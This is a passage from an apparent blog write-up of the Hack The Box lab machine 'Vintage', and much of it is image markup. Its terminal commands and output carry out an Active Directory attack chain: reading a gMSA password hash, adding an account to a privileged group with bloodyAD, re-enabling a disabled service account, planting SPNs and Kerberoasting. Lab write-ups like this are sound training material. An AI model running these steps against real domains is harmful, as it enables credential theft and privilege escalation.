https://substackcdn.com/image/fetch/$s_!9V75!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!9V75!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!9V75!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:191742,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7efaf209-3fea-4a8e-8898-ba74595939b2_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!9V75!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!9V75!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!9V75!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!9V75!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa00c902c-5ea9-4ac4-b4e1-330ce0e87f7d_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Which is 3 &#8220;GenericAll to 3 Service account (SVC):</p><ul><li><p>SVC_SQL</p></li><li><p>SVC_LDAP</p></li><li><p>SVC_ARK</p></li></ul><p>But all of the 3 SVC, everyone have the same access and no more out-bound object control.</p><p>Looking at SVC_SQL this guy have false &#8220;trust for delegations&#8221; and looking at 3 GenericAll I was thinking of:</p><ul><li><p>Shadow Credentials</p></li><li><p>Kerberoasting all (Needed to implant SPN to all)</p></li></ul><p>Moreover let&#8217;s move laterally from this Graph:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!AnOK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!AnOK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!AnOK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!AnOK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!AnOK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!AnOK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/cd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:198590,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!AnOK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!AnOK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!AnOK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!AnOK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fcd5c4b06-9bf0-48b0-8aad-c29094d61f31_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><ol start="4"><li><p><em>Lateral Movement to &#8220;ServiceManagers Group&#8221;</em></p></li></ol><p>Gain Ticket of FS01$ computer:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getTGT vintage.htb/'FS01$':fs01 -k                         
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in FS01$.ccache
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME='FS01$.ccache'</code></pre></div><p>Then read gMSA password of gMSA01$ account:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u 'FS01$' -p fs01 -k --gmsa
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\FS01$:fs01 
LDAP        dc01.vintage.htb 389    DC01             [*] Getting GMSA Passwords
LDAP        dc01.vintage.htb 389    DC01             Account: gMSA01$              NTLM: 0851299c01b944d01099fc977eaa6c67     PrincipalsAllowedToReadPassword: Domain Computers</code></pre></div><p>And now we have new pair of:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: gMSA01$
ntlm: 0851299c01b944d01099fc977eaa6c67</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u 'gMSA01$' -H 0851299c01b944d01099fc977eaa6c67 -k
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:vintage.htb) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] vintage.htb\gMSA01$:0851299c01b944d01099fc977eaa6c67</code></pre></div><p>Next we will grab the ticket of gMSA01$:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getTGT vintage.htb/'gMSA01$' -hashes :0851299c01b944d01099fc977eaa6c67                                                              
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in gMSA01$.ccache
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME='gMSA01$.ccache'</code></pre></div><p>And add our gMSA01$ account into &#8220;ServiceManagers&#8221; group</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k add groupMember ServiceManagers 'gMSA01$' 
[+] gMSA01$ added to ServiceManagers</code></pre></div><p>And now supposed we&#8217;re good to move-on to own 3 SVC account.</p><ol start="5"><li><p><em>Removing UAC for Kerberos Attack</em></p></li></ol><p>Been trying to do Kerberoasting from NetExec but thoose 3 SVC are protected by UAC, I&#8217;ll remove it from the SVC_SQL account.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!uFIp!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!uFIp!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!uFIp!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!uFIp!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!uFIp!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!uFIp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:203330,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbe1b2503-46b8-4eec-83bd-092671c0ca23_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!uFIp!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!uFIp!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!uFIp!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!uFIp!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4950cc81-3d04-4e01-b7f4-3e34bc29b3dd_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>But to do so don&#8217;t forget to re-new the gMSA01$ ticket since we&#8217;re now part of &#8220;ServiceManagers&#8220;:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo impacket-getTGT vintage.htb/'gMSA01$' -hashes :0851299c01b944d01099fc977eaa6c67                          
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in gMSA01$.ccache
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ export KRB5CCNAME='gMSA01$.ccache'                                                                                                                                                                                                                                                                                  </code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;f80b4a61-6c95-439c-87e0-0e4a3113edff&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k remove uac SVC_SQL -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from SVC_SQL's userAccountControl</code></pre></div><p>After some testing, NetExec can&#8217;t get roastable hash due to those 3 SVC doesn&#8217;t have SPNs, however we still can use:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7bnj!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7bnj!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 424w, https://substackcdn.com/image/fetch/$s_!7bnj!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 848w, https://substackcdn.com/image/fetch/$s_!7bnj!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 1272w, https://substackcdn.com/image/fetch/$s_!7bnj!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7bnj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png" width="1588" height="638" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:638,&quot;width&quot;:1588,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:440748,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193435699?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa3ca3dcc-5551-4e85-80ee-4d1c28bd834f_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!7bnj!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 424w, https://substackcdn.com/image/fetch/$s_!7bnj!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 848w, https://substackcdn.com/image/fetch/$s_!7bnj!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 1272w, https://substackcdn.com/image/fetch/$s_!7bnj!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F3f0f0136-9b38-4b0d-93e4-3ce740a3d26e_1588x638.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><a href="https://github.com/ShutdownRepo/targetedKerberoast">targetedKerberos.py tool of GitHub</a>, and if you still want NetExec we can add the SPNs our-self via bloodyAD:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k -f rc4 set object SVC_SQL servicePrincipalName -v 'http/sql'
[+] SVC_SQL's servicePrincipalName has been updated
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k -f rc4 set object SVC_LDAP servicePrincipalName -v 'http/ldap'
[+] SVC_LDAP's servicePrincipalName has been updated
                                                                                                                                                                                                   
&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo bloodyAD --host dc01.vintage.htb -d vintage.htb -u 'gMSA01$' -k -f rc4 set object SVC_ARK servicePrincipalName -v 'http/ark'
[+] SVC_ARK's servicePrincipalName has been updated</code></pre></div><p>And now we can use NetExec for roasting:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc01.vintage.htb -u 'gMSA01$' --use-kcache -k --kerberoasting out.hash                      
LDAP        dc01.vintage.htb 389    DC01             [*] None (name:DC01) (domain:VINTAGE.HTB) (signing:None) (channel binding:No TLS cert) (NTLM:False)
LDAP        dc01.vintage.htb 389    DC01             [+] VINTAGE.HTB\gMSA01$ from ccache 
LDAP        dc01.vintage.htb 389    DC01             [*] Skipping disabled account: krbtgt
LDAP        dc01.vintage.htb 389    DC01             [*] Total of records returned 3
LDAP        dc01.vintage.htb 389    DC01             [*] sAMAccountName: svc_ark, memberOf: CN=ServiceAccounts,OU=Pre-Migration,DC=vintage,DC=htb, pwdLastSet: 2024-06-06 09:45:27.913095, lastLogon: &lt;never&gt;
